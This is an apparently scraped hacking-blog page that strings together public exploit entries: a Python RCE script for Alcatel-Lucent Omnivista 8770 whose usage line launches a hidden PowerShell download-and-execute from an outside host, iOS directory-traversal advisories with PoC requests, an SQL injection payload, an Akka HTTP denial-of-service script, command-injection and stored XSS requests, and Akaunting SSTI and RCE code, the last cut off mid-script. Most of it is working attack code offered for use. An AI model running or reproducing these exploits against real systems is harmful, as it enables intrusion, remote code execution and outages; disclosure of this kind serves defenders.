import socket
import time
import sys
import os
# ref https://blog.malerisch.net/
# Omnivista Alcatel-Lucent running on Windows Server
if len(sys.argv) < 2:
print "Usage: %s <target> <command>" % sys.argv[0]
print "eg: %s 192.168.1.246 \"powershell.exe -nop -w hidden -c \$g=new-object net.webclient;IEX \$g.downloadstring('http://192.168.1.40:8080/hello');\"" % sys.argv[0]
sys.exit(1)
target = sys.argv[1]
argument1 = ' '.join(sys.argv[2:])
# so we need to get the biosname of the target... so run this poc exploit script should be run in kali directly...
netbiosname = os.popen("nbtscan -s : "+target+" | cut -d ':' -f2").read()
netbiosname = netbiosname.strip("\n")
# dirty functions to do hex magic with bytes...
### each variable has size byte before, which includes the string + "\x00" a NULL byte
### needs to calculate for each
###
def calcsize(giop):
s = len(giop.decode('hex'))
h = hex(s) #"\x04" -> "04"
return h[2:].zfill(8) # it's 4 bytes for the size
def calcstring(param): # 1 byte size calc
s = (len(param)/2)+1
h = hex(s)
return h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty...
def calcstring2(param):
s = (len(param)/2)+1
h = hex(s)
return h[2:].zfill(4)
##
#GIOP request size is specified at the 11th byte
# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............
# d8 is the size of GIOP REQUEST
# GIOP HEADER Is 12 bytes -
# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte
#phase 1 - add a jobset
giopid = 1 # an arbitrary ID can be put there...
# there are checks in the size of the username.. need to find where the size is specified - anyway, 58 bytes seems all right...
usernamedata = "xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc".encode('hex') # original "383737302061646d696e697374726174696f6e2c6f3d6e6d63"
#print "Size of usernamedata" + str(len(usernamedata.decode('hex')))
jobname = "MYJOB01".encode('hex') # size of 7 bytes # check also in the captured packet...
addjobset = "47494f50010000000000012600000000" + "00000001" + "01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008" + jobname + "00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d" + usernamedata + "00000000000a6f6d6e69766973626200" # this last part can be changed???
print "Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch"
print "Connecting to target..."
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p.connect((target, 30024))
#p = remote(target, 30024, "ipv4", "tcp")
print "Adding a job..."
p.send(addjobset.decode('hex'))
#p.recv()
data = p.recv(1024)
s = len(data)
#objectkey = "" # last 16 bytes of the response!
objectkey = data[s-16:s].encode('hex')
#print objectkey
# phase 2 - active jobset
print "Sending active packet against the job"
activegiopid = 2
active = "47494f50010000000000003100000000" + "00000002" + "0100000000000010" + objectkey + "0000000741637469766500000000000000"
#print active
p.send(active.decode('hex'))
data2 = p.recv(1024)
#print data2
# phase3 add task
addjobid = 3
print "Adding a task...."
taskname = "BBBBBBB".encode('hex')
servername = netbiosname.encode('hex')
command = "C:\Windows\System32\cmd.exe".encode('hex') #on 32bit
#command = "C:\Windows\SysWOW64\cmd.exe".encode('hex') #on 64bit
commandsize = hex((len(command.decode('hex'))+1))
commandsize = str(commandsize).replace("0x","")
#print "Command size: "+ str(commandsize)
#print command.decode('hex')
#time.sleep(10)
#powershell = str(command)
#powershell = "powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');"
#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');
#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');
argument = str("/c "+argument1).encode('hex')
#argument = str("/c notepad.exe").encode('hex')
#print len(argument.decode('hex'))
#argumentsize = len(str("/c "+powershell))+1
#print "Argument size: "+str(argumentsize)
argumentsize = calcstring2(argument)
#print "argument size: "+str(argumentsize)
#print argument.decode('hex')
def calcpadd(giop):
defaultpadding = "00000000000001"
check = giop + defaultpadding + fixedpadding
s = len(check)
#print "Size: "+str(s)
if (s/2) % 4 == 0:
#print "size ok!"
return check
else:
# fix the default padding
#print "Size not ok, recalculating padd..."
dif = (s/2) % 4
#print "diff: "+str(dif)
newpadding = defaultpadding[dif*2:]
#print "Newpadding: " +str(newpadding)
return giop + newpadding + fixedpadding
addjobhdr = "47494f5001000000" # 8 bytes + 4 bytes for message size, including size of the giop request message
fixedpadding = "000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000"
variablepadding = "000000000001"
#print calcstring(servername)
#print calcstring(taskname)
#print "Command:" +str(command)
#print "command size:"+str(commandsize)
addjob = "00000000000000b30100000000000010" + objectkey + "000000074164644a6f62000000000000000000" + calcstring(taskname) + taskname + "0000000001000000"+ commandsize + command +"00000000" + calcstring(servername) + servername + "000000" + argumentsize + argument + "00"
#print addjob
addjobfin = calcpadd(addjob)
#print addjobfin.decode('hex')
addjobsize = calcsize(addjobfin)
#print "Lenght of the addjob: "+str(len(addjobfin.decode('hex')))
# we need to add the header
finalmsg = addjobhdr + addjobsize + addjobfin
p.send(finalmsg.decode('hex'))
data3 = p.recv(1024)
#print data3
# phase4 - execute task
executeid = 4
print "Executing task..."
execute = "47494f50010000000000003500000000000001100100000000000010" + objectkey + "0000000b457865637574654e6f7700000000000000"
p.send(execute.decode('hex'))
data4 = p.recv(1024)
print "All packets sent..."
print "Exploit sequence completed, command should have been executed...:-)"
p.close()
# optional requests to remove the job after the exploitation
### in metasploit, we should migrate to another process and then call an "abort" function of Omnivista
##phase5 - abort the job
canceljob = "47494f500100000000000030000000000000008e0100000000000010" + objectkey + "0000000743616e63656c000000000000"
###phase6 - delete the jobset
deletejob = "47494f500100000000000038000000000000009e0100000000000010" + objectkey + "0000000d44656c6574654a6f625365740000000000000000"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863107131
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Document Title:
===============
Album Streamer v2.0 iOS - Directory Traversal Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1481
Release Date:
=============
2015-05-07
Vulnerability Laboratory ID (VL-ID):
====================================
1481
Common Vulnerability Scoring System:
====================================
6.6
Product & Service Introduction:
===============================
1 Tap - Quick, Album Streamer, best Photo/Video Transfer app ever! Quick way to share your Album Photos and
Videos to your computer. It takes only single tap to stream and download all/selected photos or videos.
You can even view or play slide show of all your photos directly on the computer without downloading.
(Copy of the Homepage: https://itunes.apple.com/DE/app/id835284235 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a directory traversal web vulnerability in the official Album Streamer v2.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-07: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Spider Talk
Product: Album Streamer - iOS Mobile Web Application (Wifi) 2.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A Path Traveral web vulnerability has been discovered in the official Album Streamer v2.0 iOS mobile web-application.
The security vulnerability allows a remote attacker to unauthorized request system path variables to compromise the
mobile application or apple iOS device.
The vulnerability is located in the `id` request to the `path` value of the photoDownload module. The vulnerability can be exploited by
local or remote attackers without user interaction. The attacker needs to replace the picture assets id path request of the photoDownload
module with a malicious payload like ./etc/passwd ./etc/hosts. The attack vector is located on the application-side of the service and
the request method to execute is GET (client-side).
The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction.
Successful exploitation of the vulnerability results in mobile application compromise
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] photoDownload
Vulnerable Parameter(s):
[+] id
Affected Module(s):
[+] photoDownload Item Index
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: http://localhost/photoDownload?id=[DIRECTORY TRAVERSAL]../../../../../../../etc
Vulnerable Source(s): localhost/photoDownload
<div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id0" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id0" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id0">asset.JPG</a></div></div><div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id1" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id1" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id1">asset.PNG</a></div></div>
<!-- PREVIEW SECTION -->
<div style="display: none;" id="overlay"></div>
<div style="display: none;" id="popupBox">
<div style="display: none;" id="popupContent">
<img class="previewLoadingImage" id="previewLoading" src="/loading.gif">
<img class="previewImage" src="/photoDownload?id=id1">
<img src="/imgAlbumStreamPrev.png" class="btnShowPrev" height="25px" width="25px">
<img src="/imgAlbumStreamNext.png" class="btnShowNext" height="25px" width="25px">
</div>
</div>
<!-- BREAK -->
<div class="sectionBreak"> </div>
<!-- VIDEOS SECTION -->
<div>
<h1>
<input class="videoAllCheckBox" id="videoAllCheckBox" type="checkbox"> Videos
<input class="btnVideoDownload" value="Download (Selected)" type="button">
</h1>
</div>
--- Poc Session Logs [GET] ---
Status: 200[OK]
GET http://localhost/photoDownload?id=../../../../etc Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[25568] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[25568]
Content-Disposition[: attachment; filename=asset.JPG]
Date[Thu, 30 Apr 2015 13:29:14 GMT]
Reference(s):
http://localhost/
http://localhost/photoDownload
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the id value in the photoDownload module.
Restrict the input and disallow special chars to prevent further path traversal attacks.
implement a whitelist to request only authroized urls through the mobile app api.
Security Risk:
==============
The security risk of the directory traversal vulnerability in the wifi interface is estimated as high. (CVSS 6.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Album Lock v4.0 iOS - Directory Traversal Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2033
Release Date:
=============
2017-02-20
Vulnerability Laboratory ID (VL-ID):
====================================
2033
Common Vulnerability Scoring System:
====================================
7.2
Product & Service Introduction:
===============================
Do you have any secret photo and videos in your iPhone? Album Lock can protect your privacy perfectly. Album is the most
convenient private Photo&Video App! You can add your SPECIAL photos&videos into AlbumLock, we provides many convenient ways.
From Photo App(Camera Roll), iTunes File Sharing Sync, WiFi Transfer and in App Camera.
(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 ios mobile application.
Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A directory traversal web vulnerability has been dsicovered in the official Album Lock v4.0 iOS mobile web-application.
The issue allows an attackers to unauthorized request and download local application files by manipulation of path parameters.
The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers
are able to request the local web-server during the sharing process to access unauthenticated application files. Attackers are able
to request via `getObject` image path variables to access or download files. Remote attackers are able to access the root `document`
path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server
web-application. Finally an attacker is able to access with the credentials the service by using a client via http protocol.
The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2.
Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the
vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] getObject
Vulnerable Parameter(s):
[+] filePaht
Affected Module(s):
[+] Web-Server File System
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Standard Request:
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png
PoC: Payload
/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
Malicious Request: Exploitation
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/
http://localhost:8880/getImage?filePaht=/var/mobile/
PoC: Exploit
use strict;
use LWP::UserAgent;
my $b = LWP::UserAgent->new();
my $host = "1.1.1.1:5555";
print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8880]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Reference(s):
http://localhost:8880/
http://localhost:8880/getImage
http://localhost:8880/getImage?filePaht=
http://localhost:8880/list_gif.html
http://localhost:8880/list_gif.html?folder=
Solution - Fix & Patch:
=======================
The vulnerability can be patch by disallowing the filepaht parameter to request upper local paths outside the document folder.
Include a whitelist of allowed requested path and setup a secure exception to prevent on exploitation.
Security Risk:
==============
The security risk of the directory traversal web vulnerability in the mobile application is estimated as high. (CVSS 7.2)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
source: https://www.securityfocus.com/bid/55746/info
AlamFifa CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AlamFifa CMS 1.0 Beta is vulnerable; other versions may also be affected.
user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;
# Exploit Title: Akka HTTP Denial of Service via Nested Header Comments
# Date: 18/4/2022
# Exploit Author: cxosmo
# Vendor Homepage: https://akka.io
# Software Link: https://github.com/akka/akka-http
# Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7
# Tested on: Akka HTTP 10.2.4, Ubuntu
# CVE : CVE-2021-42697
import argparse
import logging
import requests
# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()
def send_benign_request(url, verify=True):
log.info(f"Sending benign request to {url} for checking reachability...")
try:
r = requests.get(url)
log.info(f"Benign request returned following status code: {r.status_code}")
return True
except Exception as e:
log.info(f"The following exception was encountered: {e}")
return False
def send_malicious_request(url, verify=True):
log.info(f"Sending malicious request to {url}")
# Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing
nested_comment_payload = "("*8191
headers = {'User-Agent': nested_comment_payload}
try:
r = requests.get(url, headers=headers)
log.info(f"Request returned following status code: {r.status_code}")
# Expected exception to be returned if server is DoSed successfully
except requests.exceptions.RequestException as e:
if "Remote end closed connection without response" in str(e):
log.info(f"The server is unresponsive per {e}: DoS likely successful")
except Exception as e:
log.info(f"The following exception was encountered: {e}")
if __name__ == "__main__":
# Parse command line
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
required_arguments = parser.add_argument_group('required arguments')
required_arguments.add_argument("-t", "--target",
help="Target URL for vulnerable Akka server (e.g. https://localhost)",
required="True", action="store")
parser.add_argument("-k", "--insecure",
help="Disable verification of SSL/TLS certificate",
action="store_false", default=True)
args = parser.parse_args()
# Send requests: first is connectivity check, second is DoS attempt
if send_benign_request(args.target, args.insecure):
send_malicious_request(args.target, args.insecure)
# Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection
# Date: 03-14-2016
# Exploit Author: BrianWGray
# Contact: https://twitter.com/BrianWGray
# WebPage: http://somethingbroken.com/
# Vendor Homepage: https://www.akips.com/
# Software Link: https://www.akips.com/showdoc/download
# Version: 15.37 through 16.5, May impact earlier versions, remediated in 16.6
# Tested on: FreeBSD 10.2-RELEASE-p7
# CVE : N/A
1. Description
The "username" login parameter allows for OS Command injection via command Injection during a failed login attempt returns the command injection output to a limited login failure field.
By using concatenation '||' a command may be appended to the username.
The vendor has stated the following:
"Apparently the issue is in a Perl module which does an open2() of a
custom PAM program. The command is not being properly sanitised." - Vendor Reply
http://somethingbroken.com/vuln/0002.html
2. Proof of Concept
example request:
curl 'https://Application/' --data 'username=%7C%7C+whoami&password=' --compressed --insecure -# | grep -wF "Error signing in:"
example response:
<div class="alert alert-warning"><strong>Error signing in:</strong> akips</div>
3. Solution:
Update to version 16.6
https://www.akips.com/showdoc/download
4. Timeline:
* 03-14-2016: Discovered, Vendor Notified, Vendor Response
* 03-15-2016: Vendor Releases Remediated Build 16.6
# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 07-01-2021
# Exploit Author: Tyler Butler
# Vendor Homepage: https://www.akcp.com/
# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/
# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956
# Version: < SP480-20210624
# CVE: CVE-2021-35956
# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
1) Stored Cross-Site Scripting via System Settings
POST /system?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/system?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
2) Stored Cross-Site Scripting via Email Settings
POST /mail?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/mail?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save
3) Stored Cross-Site Scripting via Sensor Description
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CPCookie=sensors=400
Connection: close
_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI)
# Exploit Author: tmrswrr
# Date: 30/05/2024
# Vendor: https://akaunting.com/forum
# Software Link: https://akaunting.com/apps/crm
# Vulnerable Version(s): 3.1.8
# Tested : https://www.softaculous.com/apps/erp/Akaunting
1 ) Login with admin cred and go to : Items > New Item
https://127.0.0.1/Akaunting/1/common/items
2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers
3 ) Save it
4 ) You will be see result :
49
====================================================================================
1 ) Login with admin cred and go to :Settings > Taxes > New Tax
https://127.0.0.1/Akaunting/1/settings/taxes/1/edit
2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers
3 ) Save it
4 ) You will be see result :
49
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
====================================================================================
1 ) Login with admin cred and go to : Banking > Transactions > New Income
https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income
2 ) Write SSTI payload : {{7*7}} Description field
3 ) Save it
4 ) You will be see result :
49
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
=======================================================================================
1 ) Login with admin cred
https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit
2 ) Write SSTI payload : {{7*7}} Name field
3 ) Save it
4 ) You will be see result :
49
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
# Exploit Title: Akaunting < 3.1.3 - RCE
# Date: 08/02/2024
# Exploit Author: u32i@proton.me
# Vendor Homepage: https://akaunting.com
# Software Link: https://github.com/akaunting/akaunting
# Version: <= 3.1.3
# Tested on: Ubuntu (22.04)
# CVE : CVE-2024-22836
#!/usr/bin/python3
import sys
import re
import requests
import argparse
def get_company():
# print("[INF] Retrieving company id...")
res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)
if res.status_code != 302:
print("[ERR] No company id was found!")
sys.exit(3)
cid = res.headers['Location'].split('/')[-1]
if cid == "login":
print("[ERR] Invalid session cookie!")
sys.exit(7)
return cid
def get_tokens(url):
res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)
search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)
if not search_res:
print("[ERR] Couldn't get csrf token")
sys.exit(1)
data = {}
data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')
data['session'] = res.cookies.get('akaunting_session')
return data
def inject_command(cmd):
url = f"{target}/{company_id}/wizard/companies"
tokens = get_tokens(url)
headers.update({"X-Csrf-Token": tokens['csrf_token']})
data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}
res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
if res.status_code == 200:
res_data = res.json()
if res_data['error']:
print("[ERR] Command injection failed!")
sys.exit(4)
print("[INF] Command injected!")
def trigger_rce(app, version = "1.0.0"):
print("[INF] Executing the command...")
url = f"{target}/{company_id}/apps/install"
data = {"alias": app, "version": version, "path": f"apps/{app}/download"}
headers.update({"Content-Type":"application/json"})
res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
if res.status_code == 200:
res_data = res.json()
if res_data['error']:
search_res = re.search(r">Exit Code\:.*<", res_data['message'])
if search_res:
print("[ERR] Failed to execute the command")
sys.exit(6)
print("[ERR] Failed to install the app! no command was executed!")
sys.exit(5)
print("[INF] Executed successfully!")
def login(email, password):
url = f"{target}/auth/login"
tokens = get_tokens(url)
cookies.update({
'akaunting_session': tokens['session']
})
data = {
"_token": tokens['csrf_token'],
"_method": "POST",
"email": email,
"password": password
}
req = requests.post(url, headers=headers, cookies=cookies, data=data)
res = req.json()
if res['error']:
print("[ERR] Failed to log in!")
sys.exit(8)
print("[INF] Logged in")
cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})
def main():
inject_command(args.command)
trigger_rce(args.alias, args.version)
if __name__=='__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="target url")
parser.add_argument("--email", help="user login email.")
parser.add_argument("--password", help="user login password.")
parser.add_argument("-i", "--id", type=int, help="company id (optional).")
parser.add_argument("-c", "--command", help="command to execute.")
parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")
parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")
args = parser.parse_args()
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}
cookies = {}
